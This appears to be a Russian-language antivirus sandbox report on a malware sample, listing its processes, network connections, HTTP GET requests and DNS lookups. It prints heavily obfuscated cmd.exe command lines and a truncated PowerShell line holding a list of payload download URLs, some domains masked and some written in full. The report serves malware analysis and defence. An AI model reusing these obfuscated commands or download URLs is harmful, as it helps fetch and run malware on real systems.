Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c c^m^D, , , /v^:ON^ ,,, /C " , (, ( ,, , , ,(^sE^t ^09C=^MD^ ^dN z2 gC vu 6^q Ym ^Gi zT ^0b I2 VH jL^ ^J^f^ AM^ Y^a ^do ^j9^}OE} ^t{^4^fhN^8crg^t^J^i^ae^AcM^u}P^u}VPkIh^aQJe^x^Hr^S^q...
Сетевая активность
Подключается к
- 'ar####erlist.com':80
- 'ul####tasarim.com':80
- 'po###eam.com':80
- 'ke######swaan.unair.ac.id':80
- 'fe#####lozzies.com.br':80
TCP
Запросы HTTP GET
- http://ar####erlist.com/lr8RkOxMe
- http://ul####tasarim.com/7VXFx3ZT4
- http://po###eam.com/HyIVetFd
- http://ke######swaan.unair.ac.id/CCDTLG18u
- http://fe#####lozzies.com.br/ESNi33k
UDP
- DNS ASK ar####erlist.com
- DNS ASK ul####tasarim.com
- DNS ASK po###eam.com
- DNS ASK ke######swaan.unair.ac.id
- DNS ASK fe#####lozzies.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c c^m^D, , , /v^:ON^ ,,, /C " , (, ( ,, , , ,(^sE^t ^09C=^MD^ ^dN z2 gC vu 6^q Ym ^Gi zT ^0b I2 VH jL^ ^J^f^ AM^ Y^a ^do ^j9^}OE} ^t{^4^fhN^8crg^t^J^i^ae^AcM^u}P^u}VPkIh^aQJe^x^Hr^S^q...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' , , , /v:ON ,,, /C " , (, ( ,, , , ,(^sE^t ^09C=^MD^ ^dN z2 gC vu 6^q Ym ^Gi zT ^0b I2 VH jL^ ^J^f^ AM^ Y^a ^do ^j9^}OE} ^t{^4^fhN^8crg^t^J^i^ae^AcM^u}P^u}VPkIh^aQJe^x^Hr^S^qbR^p^;z^wv...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $iCR='Zho';$IwO='http://ar####erlist.com/lr8RkOxMe@http://ulukantasarim.com/7VXFx3ZT4@http://pornbeam.com/HyIVetFd@http://kemahasiswaan.unair.ac.id/CCDTLG18u@http://fepestalozzies.com.br/ESNi33...
